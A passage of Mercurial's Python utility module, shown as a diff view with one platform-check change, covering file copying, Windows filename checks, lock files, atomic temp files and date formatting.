1203 1203 'zfs',
1204 1204 }
1205 1205
1206 1206 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1207 1207 '''copy a file, preserving mode and optionally other stat info like
1208 1208 atime/mtime
1209 1209
1210 1210 checkambig argument is used with filestat, and is useful only if
1211 1211 destination file is guarded by any lock (e.g. repo.lock or
1212 1212 repo.wlock).
1213 1213
1214 1214 copystat and checkambig should be exclusive.
1215 1215 '''
1216 1216 assert not (copystat and checkambig)
1217 1217 oldstat = None
1218 1218 if os.path.lexists(dest):
1219 1219 if checkambig:
1220 1220 oldstat = checkambig and filestat.frompath(dest)
1221 1221 unlink(dest)
1222 1222 if hardlink:
1223 1223 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1224 1224 # unless we are confident that dest is on a whitelisted filesystem.
1225 1225 try:
1226 1226 fstype = getfstype(os.path.dirname(dest))
1227 1227 except OSError:
1228 1228 fstype = None
1229 1229 if fstype not in _hardlinkfswhitelist:
1230 1230 hardlink = False
1231 1231 if hardlink:
1232 1232 try:
1233 1233 oslink(src, dest)
1234 1234 return
1235 1235 except (IOError, OSError):
1236 1236 pass # fall back to normal copy
1237 1237 if os.path.islink(src):
1238 1238 os.symlink(os.readlink(src), dest)
1239 1239 # copytime is ignored for symlinks, but in general copytime isn't needed
1240 1240 # for them anyway
1241 1241 else:
1242 1242 try:
1243 1243 shutil.copyfile(src, dest)
1244 1244 if copystat:
1245 1245 # copystat also copies mode
1246 1246 shutil.copystat(src, dest)
1247 1247 else:
1248 1248 shutil.copymode(src, dest)
1249 1249 if oldstat and oldstat.stat:
1250 1250 newstat = filestat.frompath(dest)
1251 1251 if newstat.isambig(oldstat):
1252 1252 # stat of copied file is ambiguous to original one
1253 1253 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1254 1254 os.utime(dest, (advanced, advanced))
1255 1255 except shutil.Error as inst:
1256 1256 raise Abort(str(inst))
1257 1257
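# A minimal usage sketch (made-up paths): hardlink requests silently fall
# back to a real copy when the destination filesystem is not whitelisted
# or linking fails.
#
#   copyfile('a.txt', 'b.txt', hardlink=True)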
1258 1258 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1259 1259 """Copy a directory tree using hardlinks if possible."""
1260 1260 num = 0
1261 1261
1262 1262 gettopic = lambda: hardlink and _('linking') or _('copying')
1263 1263
1264 1264 if os.path.isdir(src):
1265 1265 if hardlink is None:
1266 1266 hardlink = (os.stat(src).st_dev ==
1267 1267 os.stat(os.path.dirname(dst)).st_dev)
1268 1268 topic = gettopic()
1269 1269 os.mkdir(dst)
1270 1270 for name, kind in listdir(src):
1271 1271 srcname = os.path.join(src, name)
1272 1272 dstname = os.path.join(dst, name)
1273 1273 def nprog(t, pos):
1274 1274 if pos is not None:
1275 1275 return progress(t, pos + num)
1276 1276 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1277 1277 num += n
1278 1278 else:
1279 1279 if hardlink is None:
1280 1280 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1281 1281 os.stat(os.path.dirname(dst)).st_dev)
1282 1282 topic = gettopic()
1283 1283
1284 1284 if hardlink:
1285 1285 try:
1286 1286 oslink(src, dst)
1287 1287 except (IOError, OSError):
1288 1288 hardlink = False
1289 1289 shutil.copy(src, dst)
1290 1290 else:
1291 1291 shutil.copy(src, dst)
1292 1292 num += 1
1293 1293 progress(topic, num)
1294 1294 progress(topic, None)
1295 1295
1296 1296 return hardlink, num
1297 1297
1298 1298 _winreservednames = {
1299 1299 'con', 'prn', 'aux', 'nul',
1300 1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1302 1302 }
1303 1303 _winreservedchars = ':*?"<>|'
1304 1304 def checkwinfilename(path):
1305 1305 r'''Check that the base-relative path is a valid filename on Windows.
1306 1306 Returns None if the path is ok, or a UI string describing the problem.
1307 1307
1308 1308 >>> checkwinfilename(b"just/a/normal/path")
1309 1309 >>> checkwinfilename(b"foo/bar/con.xml")
1310 1310 "filename contains 'con', which is reserved on Windows"
1311 1311 >>> checkwinfilename(b"foo/con.xml/bar")
1312 1312 "filename contains 'con', which is reserved on Windows"
1313 1313 >>> checkwinfilename(b"foo/bar/xml.con")
1314 1314 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1315 1315 "filename contains 'AUX', which is reserved on Windows"
1316 1316 >>> checkwinfilename(b"foo/bar/bla:.txt")
1317 1317 "filename contains ':', which is reserved on Windows"
1318 1318 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1319 1319 "filename contains '\\x07', which is invalid on Windows"
1320 1320 >>> checkwinfilename(b"foo/bar/bla ")
1321 1321 "filename ends with ' ', which is not allowed on Windows"
1322 1322 >>> checkwinfilename(b"../bar")
1323 1323 >>> checkwinfilename(b"foo\\")
1324 1324 "filename ends with '\\', which is invalid on Windows"
1325 1325 >>> checkwinfilename(b"foo\\/bar")
1326 1326 "directory name ends with '\\', which is invalid on Windows"
1327 1327 '''
1328 1328 if path.endswith('\\'):
1329 1329 return _("filename ends with '\\', which is invalid on Windows")
1330 1330 if '\\/' in path:
1331 1331 return _("directory name ends with '\\', which is invalid on Windows")
1332 1332 for n in path.replace('\\', '/').split('/'):
1333 1333 if not n:
1334 1334 continue
1335 1335 for c in _filenamebytestr(n):
1336 1336 if c in _winreservedchars:
1337 1337 return _("filename contains '%s', which is reserved "
1338 1338 "on Windows") % c
1339 1339 if ord(c) <= 31:
1340 1340 return _("filename contains '%s', which is invalid "
1341 1341 "on Windows") % escapestr(c)
1342 1342 base = n.split('.')[0]
1343 1343 if base and base.lower() in _winreservednames:
1344 1344 return _("filename contains '%s', which is reserved "
1345 1345 "on Windows") % base
1346 1346 t = n[-1:]
1347 1347 if t in '. ' and n not in '..':
1348 1348 return _("filename ends with '%s', which is not allowed "
1349 1349 "on Windows") % t
1350 1350
1351 1351 if pycompat.iswindows:
1352 1352 checkosfilename = checkwinfilename
1353 1353 timer = time.clock
1354 1354 else:
1355 1355 checkosfilename = platform.checkosfilename
1356 1356 timer = time.time
1357 1357
1358 1358 if safehasattr(time, "perf_counter"):
1359 1359 timer = time.perf_counter
1360 1360
1361 1361 def makelock(info, pathname):
1362 1362 try:
1363 1363 return os.symlink(info, pathname)
1364 1364 except OSError as why:
1365 1365 if why.errno == errno.EEXIST:
1366 1366 raise
1367 1367 except AttributeError: # no symlink in os
1368 1368 pass
1369 1369
1370 1370 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1371 1371 os.write(ld, info)
1372 1372 os.close(ld)
1373 1373
1374 1374 def readlock(pathname):
1375 1375 try:
1376 1376 return os.readlink(pathname)
1377 1377 except OSError as why:
1378 1378 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1379 1379 raise
1380 1380 except AttributeError: # no symlink in os
1381 1381 pass
1382 1382 fp = posixfile(pathname)
1383 1383 r = fp.read()
1384 1384 fp.close()
1385 1385 return r
1386 1386
1387 1387 def fstat(fp):
1388 1388 '''stat file object that may not have fileno method.'''
1389 1389 try:
1390 1390 return os.fstat(fp.fileno())
1391 1391 except AttributeError:
1392 1392 return os.stat(fp.name)
1393 1393
1394 1394 # File system features
1395 1395
1396 1396 def fscasesensitive(path):
1397 1397 """
1398 1398 Return true if the given path is on a case-sensitive filesystem
1399 1399
1400 1400 Requires a path (like /foo/.hg) ending with a foldable final
1401 1401 directory component.
1402 1402 """
1403 1403 s1 = os.lstat(path)
1404 1404 d, b = os.path.split(path)
1405 1405 b2 = b.upper()
1406 1406 if b == b2:
1407 1407 b2 = b.lower()
1408 1408 if b == b2:
1409 1409 return True # no evidence against case sensitivity
1410 1410 p2 = os.path.join(d, b2)
1411 1411 try:
1412 1412 s2 = os.lstat(p2)
1413 1413 if s2 == s1:
1414 1414 return False
1415 1415 return True
1416 1416 except OSError:
1417 1417 return True
1418 1418
1419 1419 try:
1420 1420 import re2
1421 1421 _re2 = None
1422 1422 except ImportError:
1423 1423 _re2 = False
1424 1424
1425 1425 class _re(object):
1426 1426 def _checkre2(self):
1427 1427 global _re2
1428 1428 try:
1429 1429 # check if match works, see issue3964
1430 1430 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1431 1431 except ImportError:
1432 1432 _re2 = False
1433 1433
1434 1434 def compile(self, pat, flags=0):
1435 1435 '''Compile a regular expression, using re2 if possible
1436 1436
1437 1437 For best performance, use only re2-compatible regexp features. The
1438 1438 only flags from the re module that are re2-compatible are
1439 1439 IGNORECASE and MULTILINE.'''
1440 1440 if _re2 is None:
1441 1441 self._checkre2()
1442 1442 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1443 1443 if flags & remod.IGNORECASE:
1444 1444 pat = '(?i)' + pat
1445 1445 if flags & remod.MULTILINE:
1446 1446 pat = '(?m)' + pat
1447 1447 try:
1448 1448 return re2.compile(pat)
1449 1449 except re2.error:
1450 1450 pass
1451 1451 return remod.compile(pat, flags)
1452 1452
1453 1453 @propertycache
1454 1454 def escape(self):
1455 1455 '''Return the version of escape corresponding to self.compile.
1456 1456
1457 1457 This is imperfect because whether re2 or re is used for a particular
1458 1458 function depends on the flags, etc, but it's the best we can do.
1459 1459 '''
1460 1460 global _re2
1461 1461 if _re2 is None:
1462 1462 self._checkre2()
1463 1463 if _re2:
1464 1464 return re2.escape
1465 1465 else:
1466 1466 return remod.escape
1467 1467
1468 1468 re = _re()
1469 1469
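# A minimal usage sketch: callers use util.re.compile like the stdlib
# module and transparently get re2 when it is available and the flags
# allow it.
#
#   pat = re.compile(br'[0-9a-f]{40}', remod.IGNORECASE)
#   pat.match(b'a' * 40)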
1470 1470 _fspathcache = {}
1471 1471 def fspath(name, root):
1472 1472 '''Get name in the case stored in the filesystem
1473 1473
1474 1474 The name should be relative to root, and be normcase-ed for efficiency.
1475 1475
1476 1476 Note that this function is unnecessary, and should not be
1477 1477 called, for case-sensitive filesystems (simply because it's expensive).
1478 1478
1479 1479 The root should be normcase-ed, too.
1480 1480 '''
1481 1481 def _makefspathcacheentry(dir):
1482 1482 return dict((normcase(n), n) for n in os.listdir(dir))
1483 1483
1484 1484 seps = pycompat.ossep
1485 1485 if pycompat.osaltsep:
1486 1486 seps = seps + pycompat.osaltsep
1487 1487 # Protect backslashes. This gets silly very quickly.
1488 1488 seps.replace('\\','\\\\')
1489 1489 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1490 1490 dir = os.path.normpath(root)
1491 1491 result = []
1492 1492 for part, sep in pattern.findall(name):
1493 1493 if sep:
1494 1494 result.append(sep)
1495 1495 continue
1496 1496
1497 1497 if dir not in _fspathcache:
1498 1498 _fspathcache[dir] = _makefspathcacheentry(dir)
1499 1499 contents = _fspathcache[dir]
1500 1500
1501 1501 found = contents.get(part)
1502 1502 if not found:
1503 1503 # retry "once per directory" per "dirstate.walk" which
1504 1504 # may take place for each patch of "hg qpush", for example
1505 1505 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1506 1506 found = contents.get(part)
1507 1507
1508 1508 result.append(found or part)
1509 1509 dir = os.path.join(dir, part)
1510 1510
1511 1511 return ''.join(result)
1512 1512
1513 1513 def getfstype(dirpath):
1514 1514 '''Get the filesystem type name from a directory (best-effort)
1515 1515
1516 1516 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1517 1517 '''
1518 1518 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1519 1519
1520 1520 def checknlink(testfile):
1521 1521 '''check whether hardlink count reporting works properly'''
1522 1522
1523 1523 # testfile may be open, so we need a separate file for checking to
1524 1524 # work around issue2543 (or testfile may get lost on Samba shares)
1525 1525 f1, f2, fp = None, None, None
1526 1526 try:
1527 1527 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1528 1528 suffix='1~', dir=os.path.dirname(testfile))
1529 1529 os.close(fd)
1530 1530 f2 = '%s2~' % f1[:-2]
1531 1531
1532 1532 oslink(f1, f2)
1533 1533 # nlinks() may behave differently for files on Windows shares if
1534 1534 # the file is open.
1535 1535 fp = posixfile(f2)
1536 1536 return nlinks(f2) > 1
1537 1537 except OSError:
1538 1538 return False
1539 1539 finally:
1540 1540 if fp is not None:
1541 1541 fp.close()
1542 1542 for f in (f1, f2):
1543 1543 try:
1544 1544 if f is not None:
1545 1545 os.unlink(f)
1546 1546 except OSError:
1547 1547 pass
1548 1548
1549 1549 def endswithsep(path):
1550 1550 '''Check path ends with os.sep or os.altsep.'''
1551 1551 return (path.endswith(pycompat.ossep)
1552 1552 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1553 1553
1554 1554 def splitpath(path):
1555 1555 '''Split path by os.sep.
1556 1556 Note that this function does not use os.altsep because it is
1557 1557 meant as an alternative to a simple "xxx.split(os.sep)".
1558 1558 It is recommended to use os.path.normpath() before using this
1559 1559 function if needed.'''
1560 1560 return path.split(pycompat.ossep)
1561 1561
1562 1562 def gui():
1563 1563 '''Are we running in a GUI?'''
1564 if pycompat.sysplatform == 'darwin':
1564 if pycompat.isdarwin:
1565 1565 if 'SSH_CONNECTION' in encoding.environ:
1566 1566 # handle SSH access to a box where the user is logged in
1567 1567 return False
1568 1568 elif getattr(osutil, 'isgui', None):
1569 1569 # check if a CoreGraphics session is available
1570 1570 return osutil.isgui()
1571 1571 else:
1572 1572 # pure build; use a safe default
1573 1573 return True
1574 1574 else:
1575 1575 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1576 1576
1577 1577 def mktempcopy(name, emptyok=False, createmode=None):
1578 1578 """Create a temporary file with the same contents from name
1579 1579
1580 1580 The permission bits are copied from the original file.
1581 1581
1582 1582 If the temporary file is going to be truncated immediately, you
1583 1583 can use emptyok=True as an optimization.
1584 1584
1585 1585 Returns the name of the temporary file.
1586 1586 """
1587 1587 d, fn = os.path.split(name)
1588 1588 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1589 1589 os.close(fd)
1590 1590 # Temporary files are created with mode 0600, which is usually not
1591 1591 # what we want. If the original file already exists, just copy
1592 1592 # its mode. Otherwise, manually obey umask.
1593 1593 copymode(name, temp, createmode)
1594 1594 if emptyok:
1595 1595 return temp
1596 1596 try:
1597 1597 try:
1598 1598 ifp = posixfile(name, "rb")
1599 1599 except IOError as inst:
1600 1600 if inst.errno == errno.ENOENT:
1601 1601 return temp
1602 1602 if not getattr(inst, 'filename', None):
1603 1603 inst.filename = name
1604 1604 raise
1605 1605 ofp = posixfile(temp, "wb")
1606 1606 for chunk in filechunkiter(ifp):
1607 1607 ofp.write(chunk)
1608 1608 ifp.close()
1609 1609 ofp.close()
1610 1610 except: # re-raises
1611 1611 try:
1612 1612 os.unlink(temp)
1613 1613 except OSError:
1614 1614 pass
1615 1615 raise
1616 1616 return temp
1617 1617
1618 1618 class filestat(object):
1619 1619 """help to exactly detect change of a file
1620 1620
1621 1621 'stat' attribute is result of 'os.stat()' if specified 'path'
1622 1622 exists. Otherwise, it is None. This can avoid preparative
1623 1623 'exists()' examination on client side of this class.
1624 1624 """
1625 1625 def __init__(self, stat):
1626 1626 self.stat = stat
1627 1627
1628 1628 @classmethod
1629 1629 def frompath(cls, path):
1630 1630 try:
1631 1631 stat = os.stat(path)
1632 1632 except OSError as err:
1633 1633 if err.errno != errno.ENOENT:
1634 1634 raise
1635 1635 stat = None
1636 1636 return cls(stat)
1637 1637
1638 1638 @classmethod
1639 1639 def fromfp(cls, fp):
1640 1640 stat = os.fstat(fp.fileno())
1641 1641 return cls(stat)
1642 1642
1643 1643 __hash__ = object.__hash__
1644 1644
1645 1645 def __eq__(self, old):
1646 1646 try:
1647 1647 # if ambiguity between stat of new and old file is
1648 1648 # avoided, comparison of size, ctime and mtime is enough
1649 1649 # to exactly detect change of a file regardless of platform
1650 1650 return (self.stat.st_size == old.stat.st_size and
1651 1651 self.stat.st_ctime == old.stat.st_ctime and
1652 1652 self.stat.st_mtime == old.stat.st_mtime)
1653 1653 except AttributeError:
1654 1654 pass
1655 1655 try:
1656 1656 return self.stat is None and old.stat is None
1657 1657 except AttributeError:
1658 1658 return False
1659 1659
1660 1660 def isambig(self, old):
1661 1661 """Examine whether new (= self) stat is ambiguous against old one
1662 1662
1663 1663 "S[N]" below means stat of a file at N-th change:
1664 1664
1665 1665 - S[n-1].ctime < S[n].ctime: can detect change of a file
1666 1666 - S[n-1].ctime == S[n].ctime
1667 1667 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1668 1668 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1669 1669 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1670 1670 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1671 1671
1672 1672 Case (*2) above means that a file was changed twice or more
1673 1673 within the same second (= S[n-1].ctime), so comparison of the
1674 1674 timestamps is ambiguous.
1675 1675
1676 1676 The basic idea for avoiding such ambiguity is to "advance mtime
1677 1677 by 1 second, if the timestamp is ambiguous".
1678 1678
1679 1679 But advancing mtime only in case (*2) doesn't work as
1680 1680 expected, because the naturally advanced S[n].mtime in case (*1)
1681 1681 might be equal to a manually advanced S[n-1 or earlier].mtime.
1682 1682
1683 1683 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1684 1684 treated as ambiguous regardless of mtime, to avoid overlooking
1685 1685 a change hidden by such colliding mtimes.
1686 1686
1687 1687 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1688 1688 S[n].mtime", even if size of a file isn't changed.
1689 1689 """
1690 1690 try:
1691 1691 return (self.stat.st_ctime == old.stat.st_ctime)
1692 1692 except AttributeError:
1693 1693 return False
1694 1694
1695 1695 def avoidambig(self, path, old):
1696 1696 """Change file stat of specified path to avoid ambiguity
1697 1697
1698 1698 'old' should be previous filestat of 'path'.
1699 1699
1700 1700 This skips avoiding ambiguity, if a process doesn't have
1701 1701 appropriate privileges for 'path'. This returns False in this
1702 1702 case.
1703 1703
1704 1704 Otherwise, this returns True, as "ambiguity is avoided".
1705 1705 """
1706 1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 1707 try:
1708 1708 os.utime(path, (advanced, advanced))
1709 1709 except OSError as inst:
1710 1710 if inst.errno == errno.EPERM:
1711 1711 # utime() on the file created by another user causes EPERM,
1712 1712 # if a process doesn't have appropriate privileges
1713 1713 return False
1714 1714 raise
1715 1715 return True
1716 1716
1717 1717 def __ne__(self, other):
1718 1718 return not self == other
1719 1719
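# Illustration of the ambiguity dance above (hypothetical file 'f';
# assumes both writes land within the same second, so ctime is equal):
#
#   >>> old = filestat.frompath(b'f')   # stat after the first write
#   >>> new = filestat.frompath(b'f')   # stat after the second write
#   >>> new.isambig(old)                # equal ctimes -> ambiguous
#   True
#   >>> new.avoidambig(b'f', old)       # advance mtime so caches notice
#   True
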
1720 1720 class atomictempfile(object):
1721 1721 '''writable file object that atomically updates a file
1722 1722
1723 1723 All writes will go to a temporary copy of the original file. Call
1724 1724 close() when you are done writing, and atomictempfile will rename
1725 1725 the temporary copy to the original name, making the changes
1726 1726 visible. If the object is destroyed without being closed, all your
1727 1727 writes are discarded.
1728 1728
1729 1729 The checkambig argument of the constructor is used with filestat,
1730 1730 and is useful only if the target file is guarded by a lock (e.g.
1731 1731 repo.lock or repo.wlock).
1732 1732 '''
1733 1733 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1734 1734 self.__name = name # permanent name
1735 1735 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1736 1736 createmode=createmode)
1737 1737 self._fp = posixfile(self._tempname, mode)
1738 1738 self._checkambig = checkambig
1739 1739
1740 1740 # delegated methods
1741 1741 self.read = self._fp.read
1742 1742 self.write = self._fp.write
1743 1743 self.seek = self._fp.seek
1744 1744 self.tell = self._fp.tell
1745 1745 self.fileno = self._fp.fileno
1746 1746
1747 1747 def close(self):
1748 1748 if not self._fp.closed:
1749 1749 self._fp.close()
1750 1750 filename = localpath(self.__name)
1751 1751 oldstat = self._checkambig and filestat.frompath(filename)
1752 1752 if oldstat and oldstat.stat:
1753 1753 rename(self._tempname, filename)
1754 1754 newstat = filestat.frompath(filename)
1755 1755 if newstat.isambig(oldstat):
1756 1756 # stat of changed file is ambiguous to original one
1757 1757 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1758 1758 os.utime(filename, (advanced, advanced))
1759 1759 else:
1760 1760 rename(self._tempname, filename)
1761 1761
1762 1762 def discard(self):
1763 1763 if not self._fp.closed:
1764 1764 try:
1765 1765 os.unlink(self._tempname)
1766 1766 except OSError:
1767 1767 pass
1768 1768 self._fp.close()
1769 1769
1770 1770 def __del__(self):
1771 1771 if safehasattr(self, '_fp'): # constructor actually did something
1772 1772 self.discard()
1773 1773
1774 1774 def __enter__(self):
1775 1775 return self
1776 1776
1777 1777 def __exit__(self, exctype, excvalue, traceback):
1778 1778 if exctype is not None:
1779 1779 self.discard()
1780 1780 else:
1781 1781 self.close()
1782 1782
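# Typical use as a context manager (hypothetical file name). The rename
# in close() only happens if the block exits without raising; otherwise
# discard() throws the temporary copy away:
#
#   with atomictempfile(b'somefile', mode='wb') as f:
#       f.write(b'new content\n')
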
1783 1783 def unlinkpath(f, ignoremissing=False):
1784 1784 """unlink and remove the directory if it is empty"""
1785 1785 if ignoremissing:
1786 1786 tryunlink(f)
1787 1787 else:
1788 1788 unlink(f)
1789 1789 # try removing directories that might now be empty
1790 1790 try:
1791 1791 removedirs(os.path.dirname(f))
1792 1792 except OSError:
1793 1793 pass
1794 1794
1795 1795 def tryunlink(f):
1796 1796 """Attempt to remove a file, ignoring ENOENT errors."""
1797 1797 try:
1798 1798 unlink(f)
1799 1799 except OSError as e:
1800 1800 if e.errno != errno.ENOENT:
1801 1801 raise
1802 1802
1803 1803 def makedirs(name, mode=None, notindexed=False):
1804 1804 """recursive directory creation with parent mode inheritance
1805 1805
1806 1806 Newly created directories are marked as "not to be indexed by
1807 1807 the content indexing service", if ``notindexed`` is specified
1808 1808 for "write" mode access.
1809 1809 """
1810 1810 try:
1811 1811 makedir(name, notindexed)
1812 1812 except OSError as err:
1813 1813 if err.errno == errno.EEXIST:
1814 1814 return
1815 1815 if err.errno != errno.ENOENT or not name:
1816 1816 raise
1817 1817 parent = os.path.dirname(os.path.abspath(name))
1818 1818 if parent == name:
1819 1819 raise
1820 1820 makedirs(parent, mode, notindexed)
1821 1821 try:
1822 1822 makedir(name, notindexed)
1823 1823 except OSError as err:
1824 1824 # Catch EEXIST to handle races
1825 1825 if err.errno == errno.EEXIST:
1826 1826 return
1827 1827 raise
1828 1828 if mode is not None:
1829 1829 os.chmod(name, mode)
1830 1830
1831 1831 def readfile(path):
1832 1832 with open(path, 'rb') as fp:
1833 1833 return fp.read()
1834 1834
1835 1835 def writefile(path, text):
1836 1836 with open(path, 'wb') as fp:
1837 1837 fp.write(text)
1838 1838
1839 1839 def appendfile(path, text):
1840 1840 with open(path, 'ab') as fp:
1841 1841 fp.write(text)
1842 1842
1843 1843 class chunkbuffer(object):
1844 1844 """Allow arbitrary sized chunks of data to be efficiently read from an
1845 1845 iterator over chunks of arbitrary size."""
1846 1846
1847 1847 def __init__(self, in_iter):
1848 1848 """in_iter is the iterator that's iterating over the input chunks."""
1849 1849 def splitbig(chunks):
1850 1850 for chunk in chunks:
1851 1851 if len(chunk) > 2**20:
1852 1852 pos = 0
1853 1853 while pos < len(chunk):
1854 1854 end = pos + 2 ** 18
1855 1855 yield chunk[pos:end]
1856 1856 pos = end
1857 1857 else:
1858 1858 yield chunk
1859 1859 self.iter = splitbig(in_iter)
1860 1860 self._queue = collections.deque()
1861 1861 self._chunkoffset = 0
1862 1862
1863 1863 def read(self, l=None):
1864 1864 """Read L bytes of data from the iterator of chunks of data.
1865 1865 Returns less than L bytes if the iterator runs dry.
1866 1866
1867 1867 If the size parameter is omitted, read everything."""
1868 1868 if l is None:
1869 1869 return ''.join(self.iter)
1870 1870
1871 1871 left = l
1872 1872 buf = []
1873 1873 queue = self._queue
1874 1874 while left > 0:
1875 1875 # refill the queue
1876 1876 if not queue:
1877 1877 target = 2**18
1878 1878 for chunk in self.iter:
1879 1879 queue.append(chunk)
1880 1880 target -= len(chunk)
1881 1881 if target <= 0:
1882 1882 break
1883 1883 if not queue:
1884 1884 break
1885 1885
1886 1886 # The easy way to do this would be to queue.popleft(), modify the
1887 1887 # chunk (if necessary), then queue.appendleft(). However, for cases
1888 1888 # where we read partial chunk content, this incurs 2 dequeue
1889 1889 # mutations and creates a new str for the remaining chunk in the
1890 1890 # queue. Our code below avoids this overhead.
1891 1891
1892 1892 chunk = queue[0]
1893 1893 chunkl = len(chunk)
1894 1894 offset = self._chunkoffset
1895 1895
1896 1896 # Use full chunk.
1897 1897 if offset == 0 and left >= chunkl:
1898 1898 left -= chunkl
1899 1899 queue.popleft()
1900 1900 buf.append(chunk)
1901 1901 # self._chunkoffset remains at 0.
1902 1902 continue
1903 1903
1904 1904 chunkremaining = chunkl - offset
1905 1905
1906 1906 # Use all of unconsumed part of chunk.
1907 1907 if left >= chunkremaining:
1908 1908 left -= chunkremaining
1909 1909 queue.popleft()
1910 1910 # The offset == 0 case is handled by the block above, so this
1911 1911 # never degenerates into a full copy via ``chunk[0:]``.
1912 1912 buf.append(chunk[offset:])
1913 1913 self._chunkoffset = 0
1914 1914
1915 1915 # Partial chunk needed.
1916 1916 else:
1917 1917 buf.append(chunk[offset:offset + left])
1918 1918 self._chunkoffset += left
1919 1919 left -= chunkremaining
1920 1920
1921 1921 return ''.join(buf)
1922 1922
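# A small sketch of chunkbuffer: arbitrary chunk sizes in, exact read
# sizes out (doctest-style):
#
#   >>> buf = chunkbuffer(iter([b'abc', b'defg']))
#   >>> buf.read(5)
#   'abcde'
#   >>> buf.read(2)
#   'fg'
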
1923 1923 def filechunkiter(f, size=131072, limit=None):
1924 1924 """Create a generator that produces the data in the file size
1925 1925 (default 131072) bytes at a time, up to optional limit (default is
1926 1926 to read all data). Chunks may be less than size bytes if the
1927 1927 chunk is the last chunk in the file, or the file is a socket or
1928 1928 some other type of file that sometimes reads less data than is
1929 1929 requested."""
1930 1930 assert size >= 0
1931 1931 assert limit is None or limit >= 0
1932 1932 while True:
1933 1933 if limit is None:
1934 1934 nbytes = size
1935 1935 else:
1936 1936 nbytes = min(limit, size)
1937 1937 s = nbytes and f.read(nbytes)
1938 1938 if not s:
1939 1939 break
1940 1940 if limit:
1941 1941 limit -= len(s)
1942 1942 yield s
1943 1943
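# Reading a file in bounded chunks (hypothetical names; 'process' stands
# in for real consumer code). At most 1 MB is read in total here:
#
#   fp = posixfile(b'big.bin', 'rb')
#   for chunk in filechunkiter(fp, size=65536, limit=1048576):
#       process(chunk)
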
1944 1944 def makedate(timestamp=None):
1945 1945 '''Return a unix timestamp (or the current time) as a (unixtime,
1946 1946 offset) tuple based off the local timezone.'''
1947 1947 if timestamp is None:
1948 1948 timestamp = time.time()
1949 1949 if timestamp < 0:
1950 1950 hint = _("check your clock")
1951 1951 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1952 1952 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1953 1953 datetime.datetime.fromtimestamp(timestamp))
1954 1954 tz = delta.days * 86400 + delta.seconds
1955 1955 return timestamp, tz
1956 1956
1957 1957 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1958 1958 """represent a (unixtime, offset) tuple as a localized time.
1959 1959 unixtime is seconds since the epoch, and offset is the time zone's
1960 1960 number of seconds away from UTC.
1961 1961
1962 1962 >>> datestr((0, 0))
1963 1963 'Thu Jan 01 00:00:00 1970 +0000'
1964 1964 >>> datestr((42, 0))
1965 1965 'Thu Jan 01 00:00:42 1970 +0000'
1966 1966 >>> datestr((-42, 0))
1967 1967 'Wed Dec 31 23:59:18 1969 +0000'
1968 1968 >>> datestr((0x7fffffff, 0))
1969 1969 'Tue Jan 19 03:14:07 2038 +0000'
1970 1970 >>> datestr((-0x80000000, 0))
1971 1971 'Fri Dec 13 20:45:52 1901 +0000'
1972 1972 """
1973 1973 t, tz = date or makedate()
1974 1974 if "%1" in format or "%2" in format or "%z" in format:
1975 1975 sign = (tz > 0) and "-" or "+"
1976 1976 minutes = abs(tz) // 60
1977 1977 q, r = divmod(minutes, 60)
1978 1978 format = format.replace("%z", "%1%2")
1979 1979 format = format.replace("%1", "%c%02d" % (sign, q))
1980 1980 format = format.replace("%2", "%02d" % r)
1981 1981 d = t - tz
1982 1982 if d > 0x7fffffff:
1983 1983 d = 0x7fffffff
1984 1984 elif d < -0x80000000:
1985 1985 d = -0x80000000
1986 1986 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1987 1987 # because they use the gmtime() system call which is buggy on Windows
1988 1988 # for negative values.
1989 1989 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1990 1990 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1991 1991 return s
1992 1992
1993 1993 def shortdate(date=None):
1994 1994 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1995 1995 return datestr(date, format='%Y-%m-%d')
1996 1996
1997 1997 def parsetimezone(s):
1998 1998 """find a trailing timezone, if any, in string, and return a
1999 1999 (offset, remainder) pair"""
2000 2000
2001 2001 if s.endswith("GMT") or s.endswith("UTC"):
2002 2002 return 0, s[:-3].rstrip()
2003 2003
2004 2004 # Unix-style timezones [+-]hhmm
2005 2005 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2006 2006 sign = (s[-5] == "+") and 1 or -1
2007 2007 hours = int(s[-4:-2])
2008 2008 minutes = int(s[-2:])
